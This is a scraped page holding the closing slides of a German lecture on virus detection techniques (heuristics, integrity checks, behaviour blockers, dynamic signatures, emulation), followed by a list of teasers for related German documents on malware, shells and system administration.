haben AH und BX bei Aufruf des Interrupts? nur durch Emulator zu ermitteln. Grundidee: Identifikation von Merkmalen, die Viren von anderer Software unterscheiden, Suche nach diesen Merkmalen in Dateien, Addition und Wichtung gefundener Merkmale, Entscheidung, ob Virus oder nicht. Vorteil: neue, unbekannte Viren können damit (potentiell) gefunden werden, vollständige Analyse nicht nötig Hauptproblem: zuviele false positives Negative Heuristiken: Suche nach Code, der in Viren garantiert nicht vorkommt (z.b. Dialogboxen) Spektrale Analyse: Histogramm der in einem Programm befindlichen Instruktionen 87 / / 95 Virentypische Merkmale (Auswahl) Integritätsprüfungen Junk Code Dekryptoren Selbstmodifizierender Code virustypischer Code Beispiel: Suche nach dem Marker des PE-Binärformats cmp ax, "MZ" Instruktionen, die der Compiler nicht generiert Ausführung startet am Ende einer Datei (Sprung dahin) Manipulation von Interruptvektoren (MS-DOS) Nutzung undokumentierter Funktionen Zeichenketten mit Obszönitäten ;-) Idee: Viren modifizieren Dateien (Ausnahme?) Bildung einer Checksumme über jeder uninfizierten Datei, Speicherung der Checksumme in Datenbank, späterer Vergleich gespeicherter mit aktueller Checksumme. Realisierungsmöglichkeiten:. externes Programm, periodischer Aufruf, 2. Selbsttest in ausführbaren Dateien, 3. impliziter Test durch OS beim Aufruf (Integrity Shell) 89 / 95 9 / 95 5

16 Integritätsprüfungen Bewertung Behavior Blockers/Monitors Idee: Beobachtung der Aktivität von Prozessen und Blockierung/Meldung von verdächtigen Aktivitäten für bekannte und unbekannte Viren möglich Detektion erst nach Infektion unmöglich, in legal modifizierten oder neuen Dateien Viren zu finden Ursache der Infektion nicht ermittelbar keine Virusidentifikation Datenbank ist ein bevorzugtes Angriffsziel von Retroviren erlaubt potentiell die Ausführung eines Virus Verschlüsselung von Viren wirkungslos nur relevante Operationen beobachten (Aufwand!), z.b. I/O, Systemrufe nachteilig: Payload wird u. U. ausgeführt Beispiel einer verdächtigen Aktion:. Öffnen einer Binärdatei zum Lesen und Schreiben 2. Einlesen des Teils des File Headers, der Startadresse enthält 3. Schreiben des zuvor eingelesenen Teils 4. Seek zum Ende der Datei und Append-Operation 9 / / 95 Dynamische Signaturen Emulation Idee: Ableitung von Signaturen aus der Sequenz relevanter Systemereignisse (z. B. Systemrufe) und Anwendung der statischen Suchverfahren open open read write read write read write close close Syscall Trace open, open, read open, read, write read, write, read write, read, write read, write, close write, close, close dynamische Signaturen (k=3) open, open open, read read, write write, read write, close close, close dynamische Signaturen (k=2) Idee: Code Nutzung eines CPU-Simulators, um Viruscode ungefährdet ausführen zu können innerhalb der Anti-Viren-Software komplexer Code zu verstehen Abbildung: Beispiel (kurzer) dynamischer Signaturen 93 / / 95 Was haben wir gelernt? Techniken der Virusdetektion Scanning Exakte Identifikation Statische Heuristiken Integritätsprüfungen Emulation Nur die Kombination aller Techniken ist erfolgversprechend. 95 / 95 6

TIn 1: Feedback Laboratories. Lecture 4 Data transfer. Question: What is the IP? Institut für Embedded Systems. Institut für Embedded Systems

TIn 1: Feedback Laboratories. Lecture 4 Data transfer. Question: What is the IP? Institut für Embedded Systems. Institut für Embedded Systems Mitglied der Zürcher Fachhochschule TIn 1: Lecture 4 Data transfer Feedback Laboratories Question: What is the IP? Why do we NEED an IP? Lecture 3: Lernziele Moving data, the why s and wherefores Moving

Mehr

MALWARE AM BEISPIEL VON STUXNET

MALWARE AM BEISPIEL VON STUXNET MALWARE AM BEISPIEL VON STUXNET IAV10/12 24.05.2011 Jan Heimbrodt Inhalt 1. Definition Was ist Malware? 2. Kategorisierung von Malware Viren, Würmer, Trojaner, 3. Was macht Systeme unsicher? Angriffsziele,

Mehr

Datenschutz. Schutz von Personen und Unternehmungen vor dem Missbrauch ihrer Daten. organisatorische Datenschutzmassnahmen

Datenschutz. Schutz von Personen und Unternehmungen vor dem Missbrauch ihrer Daten. organisatorische Datenschutzmassnahmen Datenschutz Schutz von Personen und Unternehmungen vor dem Missbrauch ihrer Daten. organisatorische Datenschutzmassnahmen gesetzliche Datenschutzmassnahmen www.datenschutz.ch K4.4 Datensicherheit - Datenschutz

Mehr

Computerviren. Institut fr Computerwissenschaften. Mihajlovic Roland rmihajlo@cosy.sbg.ac.at Reischmann Stefan sreisch@cosy.sbg.ac.

Computerviren. Institut fr Computerwissenschaften. Mihajlovic Roland rmihajlo@cosy.sbg.ac.at Reischmann Stefan sreisch@cosy.sbg.ac. Computerviren Mihajlovic Roland rmihajlo@cosy.sbg.ac.at Reischmann Stefan sreisch@cosy.sbg.ac.at Institut fr Computerwissenschaften Computerviren p.1/18 Der I LOVE YOU Virus Computerviren p.2/18 Geschichte

Mehr

Cyber Defense MALWARE SIGNATUREN. Dipl.-Inform. Julian Dammann Dipl.-Inform. Peter Weidenbach

Cyber Defense MALWARE SIGNATUREN. Dipl.-Inform. Julian Dammann Dipl.-Inform. Peter Weidenbach MALWARE SIGNATUREN Dipl.-Inform. Julian Dammann Dipl.-Inform. Peter Weidenbach julian.dammann@fkie.fraunhofer.de, peter.weidenbach@fkie.fraunhofer.de Cyber Defense MALWARE SIGNATUREN 1. Signaturen Allgemein

Mehr

Grundlagen der Programmierung

Grundlagen der Programmierung Übung 1: Unix Werkzeuge Robert Sombrutzki sombrutz@informatik.hu-berlin.de Unix Werkzeuge Warum? Diese Frage sollten Sie sich immer mal wieder stellen! Denkbare Antworten Weil Sie diese Werkzeuge immer

Mehr

Master-Boot-Record sichern

Master-Boot-Record sichern Master-Boot-Record sichern Allgemeines Mit dem Master-Boot-Record (MBR) kommt der normale Computernutzer nur selten in Kontakt, eigentlich nur zweimal. Bei der Installation von Linux wird in der Regel

Mehr

Personal Firewall (PFW) und Virenscanner. Präsentation von Gunawati A.-Tillmann, Miguel Lopez und Andreas Angelkorte

Personal Firewall (PFW) und Virenscanner. Präsentation von Gunawati A.-Tillmann, Miguel Lopez und Andreas Angelkorte Personal Firewall (PFW) und Virenscanner Präsentation von Gunawati A.-Tillmann, Miguel Lopez und Andreas Angelkorte Gliederung Personal Firewall Virenscanner 1. Zweck einer Firewall 2. Funktionsweise einer

Mehr

Netzwerksicherheit Musterlösung Übungsblatt 4: Viren

Netzwerksicherheit Musterlösung Übungsblatt 4: Viren Institut für Informatik Alina Barendt und Philipp Hagemeister Netzwerksicherheit Musterlösung Übungsblatt 4: Viren 1 Vorbereitung msg db "Virus" mov ah, 40h mov bx, 1 mov cx, $5 mov dx, msg int 21h ; Write

Mehr

Viren - Wie sicher ist Mobile Commerce? Patrick Heinen Systems Engineer Symantec (Deutschland) GmbH

Viren - Wie sicher ist Mobile Commerce? Patrick Heinen Systems Engineer Symantec (Deutschland) GmbH Viren - Wie sicher ist Mobile Commerce? Patrick Heinen s Engineer (Deutschland) GmbH 1 Inhalt Viren, Würmer und Trojaner Definition Funktion Typen Geschichte Virenscannern - Abwehrmechanismen Anforderungen

Mehr

Aufbau einer Testumgebung mit VMware Server

Aufbau einer Testumgebung mit VMware Server Aufbau einer Testumgebung mit VMware Server 1. Download des kostenlosen VMware Servers / Registrierung... 2 2. Installation der Software... 2 2.1 VMware Server Windows client package... 3 3. Einrichten

Mehr

Einführung in die Angewandte Bioinformatik

Einführung in die Angewandte Bioinformatik Einführung in die Angewandte Bioinformatik Kurzeinführung in Unix und verwandte Betriebssysteme Webseite zur Vorlesung http://bioinfo.wikidot.com/ Sprechstunde Mo 16-17 in OH14, R214 Sven.Rahmann -at-

Mehr

USB Treiber updaten unter Windows 7/Vista

USB Treiber updaten unter Windows 7/Vista USB Treiber updaten unter Windows 7/Vista Hinweis: Für den Downloader ist momentan keine 64 Bit Version erhältlich. Der Downloader ist nur kompatibel mit 32 Bit Versionen von Windows 7/Vista. Für den Einsatz

Mehr

Assembler DOS (Beta 1) Copyright 2000 Thomas Peschko. Assembler II - DOS. ASSEMBLER Arbeiten mit Dateien und Daten.

Assembler DOS (Beta 1) Copyright 2000 Thomas Peschko. Assembler II - DOS. ASSEMBLER Arbeiten mit Dateien und Daten. Assembler II - DOS ASSEMBLER Arbeiten mit Dateien und Daten peschko@aol.com 1 Wer nun den Eindruck hat, dass unsere Programme hauptsächlich nur Unterprogramme vor ihren Karren spannen und sich darauf beschränken

Mehr

Linux - a bit advanced

Linux - a bit advanced Linux - a bit advanced Überblick Rechteverwaltung Dateisystem Shell-Programmierung Remote login Paketsystem Alternativen-System Rechte Drei Benutzerklassen Owner/User Group Others Drei Rechte Ausführen

Mehr

Sicheres C Programmieren in Embedded Systemen ARM II (ARM7TMDI [1] ) Wintersemester 2010-2011

Sicheres C Programmieren in Embedded Systemen ARM II (ARM7TMDI [1] ) Wintersemester 2010-2011 Sicheres C in Embedded Systemen ARM II (ARM7TMDI [1] ) Wintersemester 2010-2011 Dipl. Ing. (FH) Ebrecht Roland, Infineon Technologies AG M.Eng (Electronic Systems) Güller Markus, Infineon Technologies

Mehr

Einführung zum MS Visual Studio

Einführung zum MS Visual Studio 0 Visual Studio Verzeichnispfade einstellen Stellen Sie nach dem Start von Visual Studio zunächst Ihr Home-Laufwerk, d.h. den Pfad für Ihre Projektverzeichnisse und Dateien ein. Beenden Sie Visual Studio

Mehr

Vorlesung Informationssicherheit

Vorlesung Informationssicherheit 1 / 95 Vorlesung Informationssicherheit Thema 5: Bösartige Software Robert Baumgartl 11. Mai 2016 Überblick Bösartige Software Wirtsprogramm nötig unabhängig Hintertüren Logische Bomben Viren Würmer Trojanische

Mehr

Sicherheitsdienste. Schutz von Rechnern und Speichermedien vor

Sicherheitsdienste. Schutz von Rechnern und Speichermedien vor Sicherheitsdienste Schutz von Rechnern und Speichermedien vor bewusster Manipulation unbefugtem Zugriff Fehlfunktionen des Systems menschlichem Fehlverhalten # 86 Klassen von Bedrohungen der Sicherheit

Mehr

iid software tools QuickStartGuide iid USB base driver installation

iid software tools QuickStartGuide iid USB base driver installation iid software tools QuickStartGuide iid software tools USB base driver installation microsensys Nov 2016 Introduction / Einleitung This document describes in short form installation of the microsensys USB

Mehr

1 Trojanische Pferde (2)

1 Trojanische Pferde (2) E Angriffskonzepte, Systemschwachstellen E Angriffskonzepte, Systemschwachstellen Angriff: nicht-autorisierter Zugriff auf ein System Abwehrmaßnahmen Authentisierung von Benutzern abgesicherte Kommunikation

Mehr

Computer & GNU/Linux Einführung Teil 4

Computer & GNU/Linux Einführung Teil 4 Inst. für Informatik [IFI] Computer & GNU/Linux EinführungTeil 4 Simon Haller, Sebastian Stab 1/20 Computer & GNU/Linux Einführung Teil 4 Simon Haller, Sebastian Stabinger, Benjamin Winder Inst. für Informatik

Mehr

FAQ Häufig gestellte Fragen

FAQ Häufig gestellte Fragen FAQ Häufig gestellte Fragen FAQ zu HitmanPro.Kickstart Seite 1 Inhaltsverzeichnis Einführung in HitmanPro.Kickstart... 3 F-00: Wozu wird HitmanPro.Kickstart benötigt?... 4 F-01: Kann HitmanPro.Kickstart

Mehr

Skripte. Beispiel. http://www.icp.uni-stuttgart.de. M. Fyta Computergrundlagen 73/93

Skripte. Beispiel. http://www.icp.uni-stuttgart.de. M. Fyta Computergrundlagen 73/93 Skripte Wie kann ich mir komplexe Befehle merken? Gar nicht aber der Computer kann es für mich! Einfach die Befehle in eine Textdatei schreiben und ausführbar machen #! (Shebang) in der ersten Zeile bestimmt

Mehr

ELIT2012: Security. Security: Potentielle Gefahren und Gegenmaßnahmen

ELIT2012: Security. Security: Potentielle Gefahren und Gegenmaßnahmen ELIT2012: Security Security: Potentielle Gefahren und Gegenmaßnahmen Gefahrenquellen Brute-Force-Logins Scans Exploits Malware: Viren, Würmer, Trojaner Website-Hijacking DOS, DDOS Gefahrenquellen Internet

Mehr

SHELL WE BEGIN? EINE EINFÜHRUNG IN DIE SHELL. Max Rosin - ANKÜNDIGUNGEN

SHELL WE BEGIN? EINE EINFÜHRUNG IN DIE SHELL. Max Rosin - ANKÜNDIGUNGEN SHELL WE BEGIN? EINE EINFÜHRUNG IN DIE SHELL Max Rosin - mrosin@freitagsrunde.org ANKÜNDIGUNGEN lists.freitagsrunde.org/mailman/listinfo/fopen freitagsrunde.org/techtalks 1 WAS MACHEN WIR HEUTE? Was ist

Mehr

Malware - Viren, Würmer und Trojaner

Malware - Viren, Würmer und Trojaner Department of Computer Sciences University of Salzburg June 21, 2013 Malware-Gesamtentwicklung 1984-2012 Malware-Zuwachs 1984-2012 Malware Anteil 2/2011 Malware Viren Würmer Trojaner Malware Computerprogramme,

Mehr

Vorlesung Informationssicherheit

Vorlesung Informationssicherheit 1 / 84 Vorlesung Informationssicherheit Thema 5: Bösartige Software Robert Baumgartl 24. Juni 2015 Überblick Bösartige Software Wirtsprogramm nötig unabhängig Hintertüren Logische Bomben Viren Würmer Trojanische

Mehr

Aufgabe 3 Storm-Worm

Aufgabe 3 Storm-Worm Aufgabe 3 Storm-Worm Bot: kompromittierte Maschine Kommunikationskanal, der dem Angreifer die Kontrolle über den Bot und somit das System gestattet Botnetz: Zusammenschluss mehrerer Bots koordinierte Distributed-Denial-Of-Service-Angriffe

Mehr

Einführung in git. Ben Oswald. 27. April 2014. Im Rahmen der Vorlesung Entwicklung mobiler Anwendungen

Einführung in git. Ben Oswald. 27. April 2014. Im Rahmen der Vorlesung Entwicklung mobiler Anwendungen Einführung in git Im Rahmen der Vorlesung Entwicklung mobiler Anwendungen Ben Oswald 27. April 2014 Inhaltsverzeichnis 1 Einleitung 1 1.1 Was ist git?..................................... 1 1.2 Warum sollten

Mehr

Sicherheit. Bedeutung Gefahren. Mag. Friedrich Wannerer 1

Sicherheit. Bedeutung Gefahren. Mag. Friedrich Wannerer 1 Sicherheit Bedeutung Gefahren Mag. Friedrich Wannerer 1 Sicherheitsbegriff Unversehrtheit und Vertraulichkeit persönlicher Daten Datenschutzgesetz 2000 Bedrohungen q Dialer, Spam, Spyware, Viren, Würmer,

Mehr

Sophos Virenscanner Konfiguration

Sophos Virenscanner Konfiguration Ersteller/Editor Ulrike Hollermeier Änderungsdatum 12.05.2014 Erstellungsdatum 06.07.2012 Status Final Konfiguration Rechenzentrum Uni Regensburg H:\Sophos\Dokumentation\Sophos_Konfiguration.docx Uni Regensburg

Mehr

Beispiel 2a Die eigenen ersten Schritte mit dem Gnu-Debugger GDB für Remote-Debugging

Beispiel 2a Die eigenen ersten Schritte mit dem Gnu-Debugger GDB für Remote-Debugging Beispiel 2a Die eigenen ersten Schritte mit dem Gnu-Debugger GDB für Remote-Debugging Das Beispiel orientiert sich am selben Code, der im Teil 1 der Serie verwendet wurde. Text Styles: Shell Prompt mit

Mehr

Softwareupdate-Anleitung // AC Porty L Netzteileinschub

Softwareupdate-Anleitung // AC Porty L Netzteileinschub 1 Softwareupdate-Anleitung // AC Porty L Netzteileinschub Softwareupdate-Anleitung // AC Porty L Netzteileinschub HENSEL-VISIT GmbH & Co. KG Robert-Bunsen-Str. 3 D-97076 Würzburg-Lengfeld GERMANY Tel./Phone:

Mehr

Die Architektur von UNIX/Linux- Betriebssystemen. Mag. Lukas Feiler, SSCP lukas.feiler@lukasfeiler.com http://www.lukasfeiler.

Die Architektur von UNIX/Linux- Betriebssystemen. Mag. Lukas Feiler, SSCP lukas.feiler@lukasfeiler.com http://www.lukasfeiler. Die Architektur von UNIX/Linux- Betriebssystemen Mag. Lukas Feiler, SSCP lukas.feiler@lukasfeiler.com http://www.lukasfeiler.com/lectures_brg9 1977: Berkeley Software Distribution/BSD (U.C. Berkeley) 1986:

Mehr

Exercise (Part II) Anastasia Mochalova, Lehrstuhl für ABWL und Wirtschaftsinformatik, Kath. Universität Eichstätt-Ingolstadt 1

Exercise (Part II) Anastasia Mochalova, Lehrstuhl für ABWL und Wirtschaftsinformatik, Kath. Universität Eichstätt-Ingolstadt 1 Exercise (Part II) Notes: The exercise is based on Microsoft Dynamics CRM Online. For all screenshots: Copyright Microsoft Corporation. The sign ## is you personal number to be used in all exercises. All

Mehr

Advanced Encryption Standard. Copyright Stefan Dahler 20. Februar 2010 Version 2.0

Advanced Encryption Standard. Copyright Stefan Dahler 20. Februar 2010 Version 2.0 Advanced Encryption Standard Copyright Stefan Dahler 20. Februar 2010 Version 2.0 Vorwort Diese Präsentation erläutert den Algorithmus AES auf einfachste Art. Mit Hilfe des Wissenschaftlichen Rechners

Mehr

Grundlagen der Informatik. Prof. Dr. Stefan Enderle NTA Isny

Grundlagen der Informatik. Prof. Dr. Stefan Enderle NTA Isny Grundlagen der Informatik Prof. Dr. Stefan Enderle NTA Isny 2 Datenstrukturen 2.1 Einführung Syntax: Definition einer formalen Grammatik, um Regeln einer formalen Sprache (Programmiersprache) festzulegen.

Mehr

ReadMe zur Installation der BRICKware for Windows, Version 6.1.2. ReadMe on Installing BRICKware for Windows, Version 6.1.2

ReadMe zur Installation der BRICKware for Windows, Version 6.1.2. ReadMe on Installing BRICKware for Windows, Version 6.1.2 ReadMe zur Installation der BRICKware for Windows, Version 6.1.2 Seiten 2-4 ReadMe on Installing BRICKware for Windows, Version 6.1.2 Pages 5/6 BRICKware for Windows ReadMe 1 1 BRICKware for Windows, Version

Mehr

Dynamische Web-Anwendung

Dynamische Web-Anwendung Dynamische Web-Anwendung Christiane Lacmago Seminar Betriebssysteme und Sicherheit Universität Dortmund WS 02/03 Gliederung Einleitung Definition und Erläuterung Probleme der Sicherheit Ziele des Computersysteme

Mehr

Schnellstartanleitung. Version R9. Deutsch

Schnellstartanleitung. Version R9. Deutsch System Backup and Recovery Schnellstartanleitung Version R9 Deutsch März 19, 2015 Agreement The purchase and use of all Software and Services is subject to the Agreement as defined in Kaseya s Click-Accept

Mehr

Formatting the TrekStor i.beat run

Formatting the TrekStor i.beat run DE EN Formatting the TrekStor i.beat run Formatierung des TrekStor i.beat run a Beim Formatieren werden ALLE Daten auf dem MP3-Player gelöscht. In diesem Abschnitt wird Ihnen erläutert, wie Sie Ihren MP3-Player

Mehr

Computerviren, Würmer, Trojaner

Computerviren, Würmer, Trojaner Computerviren, Würmer, Trojaner Computerviren, Würmer und Trojaner zählen zur Familie unerwünschter bzw. schädlicher Programme, der so genannten Malware. Diese Programme können sich selbst verbreiten und

Mehr

Gibt Daten im erweiterten Format aus. Dies beinhaltet die Angabe von Zugriffsrechten, Besitzer, Länge, Zeitpunkt der letzten Änderung und mehr.

Gibt Daten im erweiterten Format aus. Dies beinhaltet die Angabe von Zugriffsrechten, Besitzer, Länge, Zeitpunkt der letzten Änderung und mehr. ls [optionen] [namen]: ls zeigt den Inhalt von Verzeichnissen. Sind keine namen angegeben, werden die Dateien im aktuellen Verzeichnis aufgelistet. Sind eine oder mehrere namen angegeben, werden entweder

Mehr

stattdessen: geräteunabhängiges, abstraktes Format für Speicherung und Transfer von Daten Datei

stattdessen: geräteunabhängiges, abstraktes Format für Speicherung und Transfer von Daten Datei Dateiverwaltung Dateiverwaltung 2002 Prof. Dr. Rainer Manthey Informatik II 1 Dateien weitere zentrale Aufgabe des Betriebssystems: "Verbergen" der Details der Struktur von und der Zugriffe auf Sekundärspeicher-Medien

Mehr

Die Befehle mit dem Ziel IP sind nichts anderes als Sprungbefehle, sie sind unten noch mal aufgeführt.

Die Befehle mit dem Ziel IP sind nichts anderes als Sprungbefehle, sie sind unten noch mal aufgeführt. Die Befehle des Modellrechners in übersichtlichen Tabellen: Alle Opcodes sind Hexadezimal angegeben (s.u.). 1.) Die Ladebefehle zwischen den einzelnen Registern. In der oberen Zeile steht jeweils die Quelle

Mehr

PONS DIE DREI??? FRAGEZEICHEN, ARCTIC ADVENTURE: ENGLISCH LERNEN MIT JUSTUS, PETER UND BOB

PONS DIE DREI??? FRAGEZEICHEN, ARCTIC ADVENTURE: ENGLISCH LERNEN MIT JUSTUS, PETER UND BOB Read Online and Download Ebook PONS DIE DREI??? FRAGEZEICHEN, ARCTIC ADVENTURE: ENGLISCH LERNEN MIT JUSTUS, PETER UND BOB DOWNLOAD EBOOK : PONS DIE DREI??? FRAGEZEICHEN, ARCTIC ADVENTURE: Click link bellow

Mehr

Betriebssysteme K_Kap11B: Files, Filesysteme Datenstrukturen

Betriebssysteme K_Kap11B: Files, Filesysteme Datenstrukturen Betriebssysteme K_Kap11B: Files, Filesysteme Datenstrukturen 1 Files als lineare Liste File angeordnet als verkette Liste von Blöcken Jeder Block enthält Zeiger zum Nachfolger Zeiger = Adresse des Blocks

Mehr

Leitfaden Datensicherung und Datenrücksicherung

Leitfaden Datensicherung und Datenrücksicherung Leitfaden Datensicherung und Datenrücksicherung Inhaltsverzeichnis 1. Einführung - Das Datenbankverzeichnis von Advolux... 2 2. Die Datensicherung... 2 2.1 Advolux im lokalen Modus... 2 2.1.1 Manuelles

Mehr

Analyse der Entwicklung von Malware

Analyse der Entwicklung von Malware TU Darmstadt schmid@vwl.tu-darmstadt.de 1. Kryptowochenende 01.07.2006 Gliederung 1 Chronologische Betrachtung Übersicht über die Eigenschaften der Viren 2 3 4 Die Motivation Definitionen Chronologische

Mehr

Benutzerhandbuch bintec R4100 / R4300 Configuration Management. Copyright 17. Juli 2006 Funkwerk Enterprise Communications GmbH Version 1.

Benutzerhandbuch bintec R4100 / R4300 Configuration Management. Copyright 17. Juli 2006 Funkwerk Enterprise Communications GmbH Version 1. Benutzerhandbuch bintec R4100 / R4300 Configuration Management Copyright 17. Juli 2006 Funkwerk Enterprise Communications GmbH Version 1.0 Ziel und Zweck Haftung Marken Copyright Richtlinien und Normen

Mehr

Sicherheit im Internet 1: Viren, Würmer und Trojaner. Viren, Würmer und Trojaner. Virenlawine. Weiterbildungsveranstaltung des PING e.v.

Sicherheit im Internet 1: Viren, Würmer und Trojaner. Viren, Würmer und Trojaner. Virenlawine. Weiterbildungsveranstaltung des PING e.v. Virenlawine Sicherheit im Internet 1: FAZ 2003-06-06 FAZ 2003-08-22 Weiterbildungsveranstaltung des PING e.v. Daniel Borgmann und Dr. med. Arthur Pranada FAZ 2004-06-04 FAZ 2004-06-05 Donnerstag, 24. November

Mehr

1CONFIGURATION MANAGEMENT

1CONFIGURATION MANAGEMENT 1CONFIGURATION MANAGEMENT Copyright 11. Februar 2005 Funkwerk Enterprise Communications GmbH Bintec Benutzerhandbuch - VPN Access Reihe Version 1.0 Ziel und Zweck Haftung Marken Copyright Richtlinien und

Mehr

Softwarepraktikum: Einführung in Makefiles

Softwarepraktikum: Einführung in Makefiles Softwarepraktikum: Einführung in Makefiles (Eingebettete Systeme und Robotik),, http://ai3.inf.uni-bayreuth.de /home/db_lehre/praktika/softwarepraktikum/vorbesprechung_und_einfuehrung/vortraege/makefile_tuto

Mehr

Algorithmen und Datenstrukturen (ESE) Entwurf, Analyse und Umsetzung von Algorithmen (IEMS) WS 2012 / 2013. Vorlesung 9, Dienstag 18.

Algorithmen und Datenstrukturen (ESE) Entwurf, Analyse und Umsetzung von Algorithmen (IEMS) WS 2012 / 2013. Vorlesung 9, Dienstag 18. Algorithmen und Datenstrukturen (ESE) Entwurf, Analyse und Umsetzung von Algorithmen (IEMS) WS 2012 / 2013 Vorlesung 9, Dienstag 18. Dezember 2012 (Performance Tuning, Profiling, Maschinencode) Prof. Dr.

Mehr

Avira Professional / Server Security. Date

Avira Professional / Server Security. Date Date Agenda Wozu benötige ich einen Virenschutz für Workstations/Server? Systemanforderungen der Avira Professional Security Was bietet die Avira Professional Security? Systemanforderungen der Avira Professional

Mehr

4.6.1 Mathematische Grundlagen

4.6.1 Mathematische Grundlagen 4.6.1 Mathematische Grundlagen Die Basiseinheit für Berechnungen im AES stellt das Byte dar, daher sind viele Operationen im AES im GF(2 8 ) definiert. Um den Wert eines Byte darzustellen benutzen wir

Mehr

Stream EDitor SED und Reguläre Ausdrücke

Stream EDitor SED und Reguläre Ausdrücke Stream EDitor SED und Reguläre Ausdrücke ExactCODE New Thinking Store 11. Mai 2006 Was ist SED? sed steht für Stream EDitor eine Variante des Unix Editors ed und arbeitet auf Streams keine interaktiven

Mehr

Einführung. Übungen zur Vorlesung Virtuelle Maschinen. Stefan Potyra. SoSe 2009

Einführung. Übungen zur Vorlesung Virtuelle Maschinen. Stefan Potyra. SoSe 2009 Einführung Übungen zur Vorlesung Virtuelle Maschinen Stefan Potyra Lehrstuhl für Informatik 3 (Rechnerarchitektur) Friedrich-Alexander-Universität Erlangen-Nürnberg SoSe 2009 Übungsaufgaben 1 Entwickeln

Mehr

MySQL Queries on "Nmap Results"

MySQL Queries on Nmap Results MySQL Queries on "Nmap Results" SQL Abfragen auf Nmap Ergebnisse Ivan Bütler 31. August 2009 Wer den Portscanner "NMAP" häufig benutzt weiss, dass die Auswertung von grossen Scans mit vielen C- oder sogar

Mehr

Schnellstartanleitung. Version R9. Deutsch

Schnellstartanleitung. Version R9. Deutsch Verwenden der StorageCraft-Wiederherste llungsumgebung Schnellstartanleitung Version R9 Deutsch März 19, 2015 Agreement The purchase and use of all Software and Services is subject to the Agreement as

Mehr

Allgemeine Hintergrundinformation über Viren

Allgemeine Hintergrundinformation über Viren Allgemeine Hintergrundinformation über Viren Allgemeine Hintergrundinformation über Viren 1. Was ist ein Virus? Ein Computervirus ist ein Programm oder eine Folge von Anweisungen, mit dem Ziel sich zu

Mehr

Prozedurale Datenbank- Anwendungsprogrammierung

Prozedurale Datenbank- Anwendungsprogrammierung Idee: Erweiterung von SQL um Komponenten von prozeduralen Sprachen (Sequenz, bedingte Ausführung, Schleife) Bezeichnung: Prozedurale SQL-Erweiterung. In Oracle: PL/SQL, in Microsoft SQL Server: T-SQL.

Mehr

Shell-Scripting Linux-Kurs der Unix-AG

Shell-Scripting Linux-Kurs der Unix-AG Shell-Scripting Linux-Kurs der Unix-AG Andreas Teuchert 8. Juli 2014 Was ist ein Shell-Script? Aneinanderreihung von Befehlen, die ausgeführt werden Bedingte und wiederholende Ausführung möglich Nützlich

Mehr

Reverse Cloud. Michael Weisgerber. Channel Systems Engineer DACH September 2013

Reverse Cloud. Michael Weisgerber. Channel Systems Engineer DACH September 2013 Reverse Cloud Michael Weisgerber Channel Systems Engineer DACH September 2013 Öffentliche Wahrnehmung - heute Flame Duqu Stuxnet Page 2 2011 Palo Alto Networks. Proprietary and Confidential. Öffentliche

Mehr

x86 Assembler Praktische Einführung Sebastian Lackner Michael Müller 3. Juni 2013

x86 Assembler Praktische Einführung Sebastian Lackner Michael Müller 3. Juni 2013 x86 Assembler Praktische Einführung Sebastian Lackner Michael Müller 3. Juni 2013 1 / 53 Inhaltsverzeichnis 1 Einführung 2 Assembler Syntax, Register und Flags 3 Hauptspeicher 4 Stack 5 Assemblerbefehle

Mehr

rechtsbündige Leerzeichen mit einlesen im Datastep

rechtsbündige Leerzeichen mit einlesen im Datastep News Artikel Foren Projekte Links Über Redscope Join List Random Previous Next Startseite Foren ETL & Base SAS rechtsbündige Leerzeichen mit einlesen im Datastep 1 June, 2010-19:00 marcosch Hallo, wahrscheinlich

Mehr

MEMO_MINUTES. Update der grandma2 via USB. Paderborn, 29.06.2012 Kontakt: tech.support@malighting.com

MEMO_MINUTES. Update der grandma2 via USB. Paderborn, 29.06.2012 Kontakt: tech.support@malighting.com MEMO_MINUTES Paderborn, 29.06.2012 Kontakt: tech.support@malighting.com Update der grandma2 via USB Dieses Dokument soll Ihnen helfen, Ihre grandma2 Konsole, grandma2 replay unit oder MA NPU (Network Processing

Mehr

Sophos Anti-Virus im Active Directory

Sophos Anti-Virus im Active Directory Folie S1 Sophos Anti-Virus im Active Directory Sophos Enterprise Manager und Enterprise Library auf AD-Server GWD-Software Abonnement verschiedener Sophos-Produkte, Vorhaltung der abonnierten Antiviren-Software

Mehr

Informatik. Studiengang Chemische Technologie. Michael Roth WS 2012/2013. michael.roth@h-da.de. Hochschule Darmstadt -Fachbereich Informatik-

Informatik. Studiengang Chemische Technologie. Michael Roth WS 2012/2013. michael.roth@h-da.de. Hochschule Darmstadt -Fachbereich Informatik- Informatik Studiengang Chemische Technologie Michael Roth michael.roth@h-da.de Hochschule Darmstadt -Fachbereich Informatik- WS 2012/2013 Inhalt Teil VII Einstieg in Java I Michael Roth (h_da) Informatik

Mehr

Departement Wirtschaft. IT Forensics in action against malicious Software of the newest generation

Departement Wirtschaft. IT Forensics in action against malicious Software of the newest generation Departement Wirtschaft IT Forensics in action against malicious Software of the newest generation Dipl. Ing. Uwe Irmer IT Security- Schnappschüsse 2 Malware der neuesten Generation Professionalität- wer

Mehr

IT-Sicherheit. Informationssicherheit: IT-Sicherheit bzw. IT-Risikomanagement

IT-Sicherheit. Informationssicherheit: IT-Sicherheit bzw. IT-Risikomanagement IT-Sicherheit Informationssicherheit: Schutz aller Informationen im Unternehmen elektronisch gespeicherte Daten Informationen in nichtelektronischer Form z.b. auf Papier Expertenwissen, in den Köpfen der

Mehr

ETHISCHES ARGUMENTIEREN IN DER SCHULE: GESELLSCHAFTLICHE, PSYCHOLOGISCHE UND PHILOSOPHISCHE GRUNDLAGEN UND DIDAKTISCHE ANSTZE (GERMAN

ETHISCHES ARGUMENTIEREN IN DER SCHULE: GESELLSCHAFTLICHE, PSYCHOLOGISCHE UND PHILOSOPHISCHE GRUNDLAGEN UND DIDAKTISCHE ANSTZE (GERMAN ETHISCHES ARGUMENTIEREN IN DER SCHULE: GESELLSCHAFTLICHE, PSYCHOLOGISCHE UND PHILOSOPHISCHE GRUNDLAGEN UND DIDAKTISCHE ANSTZE (GERMAN READ ONLINE AND DOWNLOAD EBOOK : ETHISCHES ARGUMENTIEREN IN DER SCHULE:

Mehr

Shell-Programmierung

Shell-Programmierung Shell-Programmierung Dr.-Ing. Matthias Sand Lehrstuhl für Informatik 3 (Rechnerarchitektur) Friedrich-Alexander-Universität Erlangen-Nürnberg SS 2009 Shell-Programmierung 1/34 2009-04-27 Inhalt Einleitung

Mehr

Freelance 2000. DeltaPLC-Tool. Version 4 / Version 5

